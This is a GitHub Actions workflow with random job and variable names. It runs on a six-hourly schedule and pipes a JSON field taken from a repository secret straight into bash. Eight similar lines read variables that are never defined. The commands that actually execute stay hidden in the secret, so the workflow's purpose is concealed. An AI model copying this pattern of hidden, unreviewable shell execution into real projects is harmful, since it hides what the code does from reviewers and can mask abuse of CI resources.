name: wuhaoning3214
on:
  workflow_dispatch:
  schedule:
    - cron: '33 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wuhaoning3214
        env:
          hjxw9063: ${{ secrets.hjxw9063 }}
        run: |
          echo $hjxw9063 | jq -r .lhipz7 | /bin/bash
          echo $nx1201 | jq -r .yp1902 | /bin/bash
          echo $y26 | jq -r .ed40 | /bin/bash
          echo $dyf3950 | jq -r .apblv81562 | /bin/bash
          echo $kofjj7 | jq -r .dyyxk80561 | /bin/bash
          echo $xv02 | jq -r .vace0 | /bin/bash
          echo $agu5 | jq -r .zptk47821 | /bin/bash
          echo $jmn64635 | jq -r .ohvq411 | /bin/bash
          echo $mkn5278 | jq -r .z16365 | /bin/bash

